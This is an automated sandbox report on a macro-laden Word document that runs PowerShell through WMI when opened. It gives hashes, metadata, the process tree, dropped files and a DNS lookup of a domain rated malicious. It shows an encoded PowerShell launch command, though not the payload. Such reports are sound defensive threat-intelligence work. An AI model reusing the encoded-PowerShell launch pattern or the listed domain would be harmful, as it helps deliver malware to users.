File name: info_23.05.doc
Full analysis: https://app.any.run/tasks/a7d17117-98c2-4cfb-98fd-4e58a34283cd
Verdict: Malicious activity
Analysis date: May 24, 2019, 12:33:07
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: macros, macros-on-open, generated-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Title: Uzbekistan Sum, Subject: national, Author: Colt Bruen, Comments: Frozen, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu May 23 05:11:00 2019, Last Saved Time/Date: Thu May 23 05:11:00 2019, Number of Pages: 1, Number of Words: 15, Number of Characters: 89, Security: 0
MD5: 88DBEB1C0ECFC288A5ACA3885047F45E
SHA1: E7D4D1E920EA56161F7E245DEFDE8F084F6F73EB
SHA256: C1E1ED23A686334F018700246A61CC922496CE68FF4E0FED8D9A412E337ED88F
SSDEEP: 1536:Q6p6qy8GDBTb5VnUvWMyDoTITDH3eIKJKYD+viErrHo8GV7arq7s1T+a9yR:Q6p6qy8GDBTb5VUvVy6ITzpODzLZRPR

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • PowerShell script executed

      • powershell.exe (PID: 3512)
    • Executed via WMI

      • powershell.exe (PID: 3512)
    • Starts Microsoft Office Application

      • rundll32.exe (PID: 3552)
    • Creates files in the user directory

      • powershell.exe (PID: 3512)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3376)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3376)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.flo | iGrafx FlowCharter document (36.2)
.doc | Microsoft Word document (34.5)
.doc | Microsoft Word document (old ver.) (20.5)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
Manager: Dickens
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 103
Paragraphs: 1
Lines: 1
Company: Konopelski - Cummings
CodePage: Windows Cyrillic
Security: None
Characters: 89
Words: 15
Pages: 1
ModifyDate: 2019:05:23 04:11:00
CreateDate: 2019:05:23 04:11:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: Frozen
Keywords: -
Author: Colt Bruen
Subject: national
Title: Uzbekistan Sum
No data.
All screenshots are available in the full report
Total processes: 37
Monitored processes: 3
Malicious processes: 0
Suspicious processes: 1

Behavior graph

Nodes: start, rundll32.exe (no specs), winword.exe (no specs), powershell.exe (no specs)

Process information

PID: 3552
CMD: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\admin\AppData\Local\Temp\info_23.05.doc.flo
Path: C:\Windows\system32\rundll32.exe
Indicators: -
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows host process (Rundll32)
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 3376
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\info_23.05.doc.flo"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Indicators: -
Parent process: rundll32.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Exit code: 0
Version: 14.0.6024.1000

PID: 3512
CMD: powershell -nop -e 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
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators: -
Parent process: wmiprvse.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Total events: 1 992
Read events: 1 438
Write events: 0
Delete events: 0

Modification events

No data
Executable files: 0
Suspicious files: 2
Text files: 0
Unknown types: 9

Dropped files

PID: 3376
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\CVR698B.tmp.cvr
Type: -
MD5: -
SHA256: -

PID: 3512
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1BLI9FXL8A8XIEQ6UR5J.temp
Type: -
MD5: -
SHA256: -

PID: 3376
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\~DFAB135047CAFAED07.TMP
Type: -
MD5: -
SHA256: -

PID: 3376
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{724A7071-CD0C-4CCC-9570-5104A8B83D59}.tmp
Type: -
MD5: -
SHA256: -

PID: 3376
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{805D23C7-FAE7-48EC-9A28-E86B2FC83B79}.tmp
Type: -
MD5: -
SHA256: -

PID: 3376
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
Type: pgc
MD5: 01323F148C83A32CF5452750422767CC
SHA256: B1B516E8510F694E6E20DC3D77472DB209A4A66544B86C1CF49373F8D14D5B65

PID: 3376
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\846C6923.wmf
Type: wmf
MD5: 296715247637B5E0E4A13E77B3498960
SHA256: 3A97E1D74255C9908669B079A11F031C1A7998D456AEC1290E7A10F33502F0F5

PID: 3376
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd
Type: tlb
MD5: 28F8559CAF37AFB65EC1D85F6E9E7AE3
SHA256: E9637B527B04FA20CD73057872B770065D751256F09FC9BEDCCCA97CA5CF4AF5

PID: 3512
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Type: binary
MD5: 33B4C42BAF9E3CA295E3BDCD51C02EAF
SHA256: B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5

PID: 3376
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F6F328E7.wmf
Type: wmf
MD5: 1D5B7ECF314806E22CFBA40108614D54
SHA256: D803A25B2CC0B61A357E57D6B820229A5735D3C00D7D49D6435D86585626926E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 0
TCP/UDP connections: 0
DNS requests: 4
Threats: 0

HTTP requests

No HTTP requests

Connections

No data

DNS requests

Domain: mfomjr.com
IP: -
Reputation: malicious

Threats

No threats detected
No debug info